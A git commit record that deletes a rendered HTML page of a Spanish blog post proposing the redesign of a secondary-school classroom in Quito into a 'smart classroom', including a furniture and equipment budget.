{"commit":"526e671315b6260a07678858646d30aaa61124b1","subject":"Deleted 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Deleted 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"\n\n\n \n \n\n Estilos de aprendizaje e Innovaci\u00f3n educagiva - Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\">\n <meta property=\"og:description\" content=\"\">\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/css\/uno.css?v=1.0.0\" \/>\n\n <link rel=\"canonical\" href=\"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\" \/>\n \n <meta property=\"og:site_name\" content=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" \/>\n <meta property=\"og:type\" content=\"article\" \/>\n <meta property=\"og:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\" \/>\n <meta property=\"og:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta property=\"og:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\" \/>\n <meta property=\"article:published_time\" content=\"Invalid date\" \/>\n <meta property=\"article:modified_time\" content=\"2016-07-30T18:36:52.013Z\" \/>\n <meta property=\"article:tag\" content=\"e-learning\" \/>\n <meta property=\"article:tag\" content=\"innovaci\u00f3n\" \/>\n <meta property=\"article:tag\" content=\"estilos de aprendizaje\" \/>\n <meta property=\"article:tag\" content=\"TIC\" \/>\n <meta property=\"article:tag\" content=\"educaci\u00f3n\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\" \/>\n <meta name=\"twitter:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\" \/>\n \n <script type=\"application\/ld+json\">\n{\n \"@context\": \"http:\/\/schema.org\",\n \"@type\": \"Article\",\n \"publisher\": \"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\",\n \"author\": {\n \"@type\": \"Person\",\n \"name\": \"Marcelo Sotaminga\",\n \"image\": \"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\",\n \"url\": \"undefined\/author\/undefined\",\n \"sameAs\": null\n },\n \"headline\": \"Estilos de aprendizaje e Innovaci\u00f3n educagiva\",\n \"url\": \"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\",\n \"datePublished\": \"Invalid date\",\n \"dateModified\": \"2016-07-30T18:36:52.013Z\",\n \"keywords\": \"e-learning, innovaci\u00f3n, estilos de aprendizaje, TIC, educaci\u00f3n\",\n \"description\": \"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\"\n}\n <\/script>\n\n <meta name=\"generator\" content=\"Ghost ?\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" href=\"https:\/\/marchelo2212.github.io\/rss\" \/>\n <link rel=\"stylesheet\" href=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/styles\/default.min.css\">\n\n<\/head>\n<body class=\"post-template tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion no-js\">\n\n <span class=\"mobile btn-mobile-menu\">\n <i class=\"icon icon-list btn-mobile-menu__icon\"><\/i>\n <i class=\"icon icon-x-circle btn-mobile-close__icon hidden\"><\/i>\n <\/span>\n\n <header class=\"panel-cover panel-cover--collapsed \" >\n <div class=\"panel-main\">\n \n <div class=\"panel-main__inner panel-inverted\">\n <div class=\"panel-main__content\">\n \n <h1 class=\"panel-cover__title panel-title\"><a href=\"https:\/\/marchelo2212.github.io\" title=\"link to homepage for Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\">Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/a><\/h1>\n <hr class=\"panel-cover__divider\" \/>\n <p class=\"panel-cover__description\">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aqu\u00ed encontrar\u00e1s cosas referente a:\n Software Libre - GNU \/ Linux\n Innovaci\u00f3n Educativa\n Ciencia y Tecnolog\u00eda\n Entre otras....\n <\/p>\n <hr class=\"panel-cover__divider panel-cover__divider--secondary\" \/>\n \n <div class=\"navigation-wrapper\">\n \n <nav class=\"cover-navigation cover-navigation--primary\">\n <ul class=\"navigation\">\n <li class=\"navigation__item\"><a href=\"https:\/\/marchelo2212.github.io\/#blog\" title=\"link to Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s.. blog\" class=\"blog-button\">Blog<\/a><\/li>\n <\/ul>\n <\/nav>\n \n \n \n <nav class=\"cover-navigation navigation--social\">\n <ul class=\"navigation\">\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/www.facebook.com\/marchelo2212\" title=\"Facebook account\">\n <i class='icon icon-social-facebook'><\/i>\n <span class=\"label\">Facebook<\/span>\n <\/a>\n <\/li>\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/twitter.com\/Marchelo2212\" title=\"Twitter account\">\n <i class='icon icon-social-twitter'><\/i>\n <span class=\"label\">Twitter<\/span>\n <\/a>\n <\/li>\n \n <!-- Google Plus -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/plus.google.com\/u\/0\/+MarceloSotaminga\" title=\"Google+ account\">\n <i class='icon icon-social-google-plus'><\/i>\n <span class=\"label\">Google-plus<\/span>\n <\/a>\n <\/li>\n \n \n \n \n \n <!-- LinkedIn -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/ec.linkedin.com\/in\/marcelo-sotaminga-9ab64562\" title=\"LinkedIn account\">\n <i class='icon icon-social-linkedin'><\/i>\n <span class=\"label\">LinkedIn<\/span>\n <\/a>\n <\/li>\n \n <!-- Email -->\n <li class=\"navigation__item\">\n <a href=\"mailto:marcelo@openmailbox.org\" title=\"Email marcelo@openmailbox.org\">\n <i class='icon icon-mail'><\/i>\n <span class=\"label\">Email<\/span>\n <\/a>\n <\/li>\n \n <\/ul>\n <\/nav>\n \n \n <\/div>\n \n <\/div>\n \n <\/div>\n \n <div class=\"panel-cover--overlay\"><\/div>\n <\/div>\n <\/header>\n\n <div class=\"content-wrapper\">\n <div class=\"content-wrapper__inner\">\n \n\n <article class=\"post-container post-container--single\">\n\n <header class=\"post-header\">\n <div class=\"post-meta\">\n <time datetime=\"Invalid date\" class=\"post-meta__date date\">Invalid date<\/time> • <span class=\"post-meta__tags tags\">on <a href=\"https:\/\/marchelo2212.github.io\/tag\/e-learning\">e-learning<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/innovacion\"> innovaci\u00f3n<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/estilos-de-aprendizaje\"> estilos de aprendizaje<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/TIC\">TIC<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/educacion\"> educaci\u00f3n<\/a><\/span>\n <span class=\"post-meta__author author\"><img src=\"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\" alt=\"profile image for Marcelo Sotaminga\" class=\"avatar post-meta__avatar\" \/> by Marcelo Sotaminga<\/span>\n <\/div>\n <h1 class=\"post-title\">Estilos de aprendizaje e Innovaci\u00f3n educagiva<\/h1>\n <\/header>\n\n <section class=\"post tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion\">\n <div id=\"preamble\">\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>1.<a href=\"#fase1\">[fase1]<\/a><br>\n<<#presupuesto,Presupuesto>><br>\n<a href=\"#Presupuesto\">[Presupuesto]<\/a><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Learn how to <a href=\"#link-macro-attributes\">use attributes within the link macro<\/a>.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>efer to <a href=\"document-b.html#section-b\">Section B<\/a> for more information.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect1\">\n<h2 id=\"__a_href_fase_1_fase_1_a_dise_o_de_una_aula_smart_classroom\"><a href=\"#Fase 1\">[Fase 1]<\/a>: Dise\u00f1o de una aula smart classroom<\/h2>\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>La educaci\u00f3n del siglo XXI se ha visto inmersa por los grandes cambios sociales que se han suscitado por la implementaci\u00f3n de las TICs en las diversas actividades del ser humano, esto ha obligado al surgimiento de cambios en el c\u00f3mo, donde, con qui\u00e9n, y con qu\u00e9 se hacen diversas\ncosas u actividades.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>En el sector de la educaci\u00f3n se ha dado la apertura para de creaci\u00f3n de nuevos recursos did\u00e1cticos, en los que un factor com\u00fan es el uso de la tecnolog\u00eda, por ende han surgido nuevos teor\u00edas, modelos o visiones del aprendizaje como son el conectivismo, flipped classroom, gamificaci\u00f3n,mlearning, learning analytics entre otras, todas buscando lograr un mejor aprendizaje en el estudiante donde la tecnolog\u00eda, la pedagog\u00eda y el conocimiento se mezclen de tal manera que generen aprendizajes significativos y colaborativos para todos los participantes.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>As\u00ed mismo debido al uso masivo de las TICs han aparecido nuevas competencias digitales, tipos de aprendizaje, formas de aprendizaje, etc, es as\u00ed que el docente ha necesitado responderdiversas exigencias como el manejo de la tecnolog\u00eda, la pedagog\u00eda y el conocimiento del contenido (Modelo TPACK) y con ello han surgido nuevas necesidades dentro de los espacios donde se genera el proceso de ense\u00f1anza \u2013 aprendizaje.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El presente proyecto de aula promver\u00e1 un trabajo colaborativo dentro de todos los integrantes un aula de clases, desarrollar\u00e1 la creatividad de los estudiantes y promover\u00e1 el liderazgo de cada uno de ellos, se lo ha dise\u00f1ado de tal manera que se logren emplear metodolog\u00edas educativas innovadoras y distruptivas en las que se pueda sacar el mayor provecho de las capacidades de los estudiantes, la metodolog\u00eda y el ambiente f\u00edsico.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>En vista que dentro del aula de clases se desarrolar\u00e1n la mayor\u00eda de actividades acad\u00e9micas se ha buscado el lograr un espacio f\u00edsico que facilite la interacci\u00f3n con las personas de una forma acogedora, pero a la vez, tambi\u00e9n nos permita generar conocimiento de una forma democr\u00e1tica y asimilar el mismo de igual manera.<\/p>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_contextualizaci_n\">Contextualizaci\u00f3n<\/h3>\n<div class=\"paragraph\">\n<p>La Unidad Educativa \"Milenio\", esta ubicada al norte de la ciudad Quito, capital de Ecuador, cuenta con un cuerpo docente de 38 docentes para las diferentes \u00e1reas del conocimiento, oferta un bachillerato unificado en ciencias y tambi\u00e9n se encuetra entre las unidades educativas con capacidad de ofertar un Bachillerato Internacional.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Esta propuesta de proyecto esta dirigida a estudiantes de nivel secundario del primer a\u00f1os de bachillerato, entre los 15 y 16 a\u00f1os de edad, para trabajar la asignatura de emprendimiento y gesti\u00f3n; el espacio f\u00edsico tiene las dimensiones 16m de largo por 8 de ancho, cuenta con energ\u00eda el\u00e9ctrica, red inal\u00e1mbrica interna y conexi\u00f3n a internet con uan velocidad de 10mbps.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Este espacio f\u00edsico se lo contruy\u00f3 con las siguientes caracter\u00edsticas:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Puerta estilo francesa.<\/p>\n<\/li>\n<li>\n<p>Ventanales de 3m en cada pared<\/p>\n<\/li>\n<li>\n<p>V\u00eddrios templado transparentes<\/p>\n<\/li>\n<li>\n<p>Multiples tomas correinte tanto en paredes como techo.<\/p>\n<\/li>\n<li>\n<p>Pizarra para marcador l\u00edquido<\/p>\n<\/li>\n<li>\n<p>Muebl\u00e9s st\u00e1ndar de clase (sella y mesas individual) estudiante.<\/p>\n<\/li>\n<li>\n<p>Escritio y silla para el docente.<\/p>\n<\/li>\n<li>\n<p>Libreros, casilleros para los estudiantes<\/p>\n<\/li>\n<li>\n<p>Proyector<\/p>\n<\/li>\n<li>\n<p>Sistema de audio (parlantes)<\/p>\n<\/li>\n<li>\n<p>Un computador para el docente con sistema windows 8.1<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera este espacio posee las car\u00e1cter\u00edsitcas comunes al compararla con otras aulas de clase de la instituci\u00f3n; sin embargo gracias a la gesti\u00f3n realizada por parte de las autoridades se ha logrado un fondo de 3200 usd, para la aducaci\u00f3n de este espacio y tranformarlo en una smarth class acorde las necesidades de la misma y posibilidades ya existentes.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera el actual proyecto propone un redise\u00f1o interno del aula de clase y una optimizaci\u00f3n del espacio, buscando el mejorar el desempe\u00f1o de cada participate del proceso<\/p>\n<\/div>\n<div class=\"sect3\">\n<h4 id=\"_transformando_el_aula_de_clase_a_una_smarth_classroom\">Transformando el aula de clase a una Smarth ClassRoom<\/h4>\n<div class=\"paragraph\">\n<p>Al querer tranformar este espacio es necesario buscar una integracion del espacio con la tecnolog\u00eda, acorde lo mencionado por Gros, 2000 y 2004;\nHutchings y Standley, (2000) donde defienden, a partir de sus ideas y reflexiones, que en una smart classroom deber\u00eda asociarse<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><em>\u201c…​ una integraci\u00f3n invisible de la tecnolog\u00eda en el espacio de aprendizaje.\u201d<\/em><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Debtro de una smarth Classroom se busca la intersecci\u00f3n de tres elementos que interact\u00faan en el dise\u00f1o del espacio de aprendizaje:<\/p>\n<\/div>\n<div class=\"olist arabic\">\n<ol class=\"arabic\">\n<li>\n<p>El dise\u00f1o arquitect\u00f3nico y la ergonom\u00eda del aula, poseer mobiliario e\ninstrumentos que faciliten el trabajo dentro del aula, la creatividad y colaboraci\u00f3n.<\/p>\n<\/li>\n<li>\n<p>La integraci\u00f3n de la tecnolog\u00eda de manera: funcional, invisible, justificada e\nintensiva<\/p>\n<\/li>\n<li>\n<p>Una metodolog\u00eda did\u00e1ctica: innovadora, disruptiva y oblicua; adecuada a este\nespacio con la finalidad de hacer m\u00e1s eficiente y satisfactorio el proceso de\naprendizaje.<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<div class=\"paragraph\">\n<p>Para poder considerarse una Smart classroom necesariamente deber\u00e1 poseer ciertas\ncaracter\u00edsticas did\u00e1cticas como son:<br><\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Flexibilidad en la estructura f\u00edsica<\/p>\n<\/li>\n<li>\n<p>Adaptabilidad<\/p>\n<\/li>\n<li>\n<p>Confortabilidad<\/p>\n<\/li>\n<li>\n<p>Riqueza y variabilidad<\/p>\n<\/li>\n<li>\n<p>Conectividad<\/p>\n<\/li>\n<li>\n<p>Personalizaci\u00f3n<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>Por todo esto se ha planteado el siguiente plano de la clase en la que se pueden evidenciar los cambios que se necesitrar\u00edan.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image center\"><img src=\"https:\/\/dl.dropboxusercontent.com\/u\/82435380\/Tutorias%20Marcelo\/clase.jpg\" alt=\"interaprendizaje\" width=\"600\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera los cambios que se realizar\u00e1n son los siguientes:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Aula cuenta con una PDI (Pizarra Digital Interactiva), de bajo costo, ya que se la realizo con el proyecto de Jonny Lee Chunlee,<\/p>\n<\/li>\n<li>\n<p>Usar sistema operativos GNU\/Linux Edubuntu, ya que posee gran cantidad de software educativo did\u00e1ctivo.<\/p>\n<\/li>\n<li>\n<p>Incorporar mesas para trabajo grupal<\/p>\n<\/li>\n<li>\n<p>Agregar computadores, core I3 con sistema operativo Edubunto<\/p>\n<\/li>\n<li>\n<p>Incorporar tablets<\/p>\n<\/li>\n<li>\n<p>Generar un espacios que promuevan la creatividad y el trabajo colaborativo.<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>Se ha planeado para realizar trabajado en grupos de 4 estudiantes, en el caso de ser m\u00e1s se podr\u00e1n dar uso a puf ubicados alrededor, se cuenta con dos \u00e1reas bien limitadas, el \u00e1rea \"acad\u00e9mcia\", donde se realiz\u00e1 en su mayor\u00eda el proceso de ense\u00f1ana aprendizaje guiada por el docente\/facilitador y el segundo \"recreativo\"donde se podr\u00e1 continuar con este proceso de una manera menos formal y m\u00e1s libre.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Se ha generado estos espacios con el fin de que el estudiante logre identificar cada \u00e1rea y que logre trabajar de diferente manera en cada una, es decir, en el \u00e1rea \"acad\u00e9mica\" se busca dirigir la atenci\u00f3n a que el estudiante comprenda las directrices planteadas y\/o conocimiento s necesarios para realizar las actividades.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Por otro lado en el \u00e1rea recreativa el estudiante podr\u00e1 relajarse y sentirse libres el la convivencia con sus compa\u00f1eros,interactuando y trabajando colaborativamente desde diversos puntos de esta \u00e1rea.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>tambi\u00e9n se han ubicado \u00e1reas para la ubicaci\u00f3n de materiales del estudiante (pertenencias) y otro de materiales del Aula (Librero, armario), as\u00ed mismo se ha instalado una impresora inal\u00e1mbrica para poder tener impreso o imprimir cualquier documentaci\u00f3n que se necesite.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Tambi\u00e9n se cuenta con una mesa principal que permitir\u00e1 tener un espacio para trabajar entre todos, as\u00ed cada estudiante podr\u00e1 construir su conocimiento y aportar al del resto y esto facilitar\u00e1 la flexi\u00f3n, an\u00e1lisis y s\u00edntesis de toda la informaci\u00f3n\/concimeinto y resolver infinidad de retos.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El docente\/facilitador cuenta con su espacio ubicado de tal manera que le sea f\u00e1cil dirigirse al grupo y verificar el desarrollo de las actividades o planificar las mismas. Una las de las car\u00e1cter\u00edsitcas de todo el inmobiliario es que puede desplazarse con facilidad, ya que posee ruedas en cada pata.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Para visializar en 3D esta aula por favor visite este link:<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><a href=\"http:\/\/floorplanner.com\/projects\/37242114-smarthclassroom\/#details\" target=\"_blank\">mapa 3D Smarth ClassRoom<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"__a_href_presupuesto_presupuesto_a\"><a href=\"#presupuesto\">Presupuesto<\/a><\/h3>\n<div class=\"paragraph\">\n<p>Es necesario dar todo el uso posible al inmobiliario ya existe al igual que a la tecnolog\u00eda que posee ya el aula de clase por ello se propone:<\/p>\n<\/div>\n<table class=\"tableblock frame-all grid-all\">\n<caption class=\"title\">Table 1. Tabla de presupuesto<\/caption>\n<colgroup>\n<col>\n<col>\n<col>\n<col>\n<\/colgroup>\n<thead>\n<tr>\n<th class=\"tableblock halign-left valign-top\">Cantidad<\/th>\n<th class=\"tableblock halign-left valign-top\">Descripci\u00f3n<\/th>\n<th class=\"tableblock halign-left valign-top\">Valor Individual<\/th>\n<th class=\"tableblock halign-left valign-top\">Valor Total<\/th>\n<\/tr>\n<\/thead>\n<tfoot>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><\/td>\n<td class=\"tableblock halign-left valign-top\"><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Total<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">3274<\/p><\/td>\n<\/tr>\n<\/tfoot>\n<tbody>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">16<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Sillas giratorias<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">20<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">320<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">4<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Mesas para trabajo grupal 6 personas<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">70<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">280<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">5<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Laptos Core I3<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">250<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1250<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">5<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Tablets<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">100<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">500<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">2<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Sofas<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">130<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">260<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">8<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Puf \u2013 cojines<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">15<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">120<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Mesa grupal grande<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">130<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">130<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Impresora multifunci\u00f3n (copiadora, escanner e impresota)<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">150<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">150<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">2<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Alfombras<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">120<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">240<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Dispensador de agua caliente\/fria<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">24<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">24<\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div class=\"admonitionblock note\">\n<table>\n<tr>\n<td class=\"icon\">\n<i class=\"fa icon-note\" title=\"Note\"><\/i>\n<\/td>\n<td class=\"content\">\nEste valor de 3274 d\u00f3lares es el cambio del euro (3000) a dolar.\n<\/td>\n<\/tr>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n <\/section>\n\n <\/article>\n\n \n <section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'marchelo2212'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n <\/section>\n \n\n\n\n <footer class=\"footer\">\n <span class=\"footer__copyright\">© 2016. All rights reserved.<\/span>\n <span class=\"footer__copyright\"><a href=\"http:\/\/uno.daleanthony.com\" title=\"link to page for Uno Ghost theme\">Uno theme<\/a> by <a href=\"http:\/\/daleanthony.com\" title=\"link to website for Dale-Anthony\">Dale-Anthony<\/a><\/span>\n <span class=\"footer__copyright\">Proudly published with <a href=\"http:\/\/hubpress.io\" title=\"link to Hubpress website\">Hubpress<\/a><\/span>\n <\/footer>\n <\/div>\n <\/div>\n\n <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad(); \n <\/script>\n\n <script type=\"text\/javascript\" src=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/js\/main.js?v=1.0.0\"><\/script>\n \n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-70778105-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n<\/body>\n<\/html>\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} 